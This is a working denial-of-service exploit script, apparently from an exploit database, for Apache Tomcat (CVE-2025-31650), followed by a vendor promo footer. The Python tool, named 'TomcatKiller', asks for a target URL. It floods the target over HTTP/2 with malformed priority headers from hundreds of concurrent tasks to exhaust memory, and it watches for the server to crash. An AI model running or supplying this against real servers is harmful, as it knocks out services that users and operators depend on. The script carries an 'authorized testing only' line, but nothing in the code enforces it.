# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS)
# Author: Abdualhadi khalifa
# CVE: CVE-2025-31650
import httpx
import asyncio
import random
import urllib.parse
import sys
import socket
from colorama import init, Fore, Style
init()
class TomcatKiller:
def __init__(self):
self.success_count = 0
self.error_count = 0
self.invalid_priorities = [
\\\"u=-1, q=2\\\",
\\\"u=4294967295, q=-1\\\",
\\\"u=-2147483648, q=1.5\\\",
\\\"u=0, q=invalid\\\",
\\\"u=1/0, q=NaN\\\",
\\\"u=1, q=2, invalid=param\\\",
\\\"\\\",
\\\"u=1, q=1, u=2\\\",
\\\"u=99999999999999999999, q=0\\\",
\\\"u=-99999999999999999999, q=0\\\",
\\\"u=, q=\\\",
\\\"u=1, q=1, malformed\\\",
\\\"u=1, q=, invalid\\\",
\\\"u=-1, q=4294967295\\\",
\\\"u=invalid, q=1\\\",
\\\"u=1, q=1, extra=\\\",
\\\"u=1, q=1; malformed\\\",
\\\"u=1, q=1, =invalid\\\",
\\\"u=0, q=0, stream=invalid\\\",
\\\"u=1, q=1, priority=recursive\\\",
\\\"u=1, q=1, %invalid%\\\",
\\\"u=0, q=0, null=0\\\",
]
async def validate_url(self, url):
try:
parsed_url = urllib.parse.urlparse(url)
if not parsed_url.scheme or not parsed_url.hostname:
raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\")
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80)
return host, port
except Exception:
print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\")
sys.exit(1)
async def check_http2_support(self, host, port):
async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client:
try:
response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"})
if response.http_version == \\\"HTTP/2\\\":
print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\")
return True
else:
print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\")
return False
except Exception:
print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\")
return False
async def send_invalid_priority_request(self, host, port, num_requests, task_id):
async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client:
url = f\\\"https://{host}:{port}/\\\"
for i in range(num_requests):
headers = {
\\\"priority\\\": random.choice(self.invalid_priorities),
\\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\",
\\\"cache-control\\\": \\\"no-cache\\\",
\\\"accept\\\": f\\\"*/*; q={random.random()}\\\",
}
try:
await client.get(url, headers=headers)
self.success_count += 1
except Exception:
self.error_count += 1
async def monitor_server(self, host, port):
while True:
try:
with socket.create_connection((host, port), timeout=2):
print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\")
except Exception:
print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\")
break
await asyncio.sleep(2)
async def run_attack(self, host, port, num_tasks, requests_per_task):
print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\")
print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\")
print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\")
monitor_task = asyncio.create_task(self.monitor_server(host, port))
tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)]
await asyncio.gather(*tasks)
monitor_task.cancel()
total_requests = num_tasks * requests_per_task
success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0
print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\")
print(f\\\"Target: {host}:{port}\\\")
print(f\\\"Total Requests: {total_requests}\\\")
print(f\\\"Successful Requests: {self.success_count}\\\")
print(f\\\"Failed Requests: {self.error_count}\\\")
print(f\\\"Success Rate: {success_rate:.2f}%\\\")
print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\")
async def main():
print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\")
print(f\\\"Developed by: @absholi7ly\\\")
print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\")
print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\")
url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\")
num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300)
requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000)
tk = TomcatKiller()
host, port = await tk.validate_url(url)
if not await tk.check_http2_support(host, port):
sys.exit(1)
await tk.run_attack(host, port, num_tasks, requests_per_task)
if __name__ == \\\"__main__\\\":
try:
asyncio.run(main())
print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\")
except KeyboardInterrupt:
print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\")
sys.exit(0)
except Exception as e:
print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\")
sys.exit(1)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation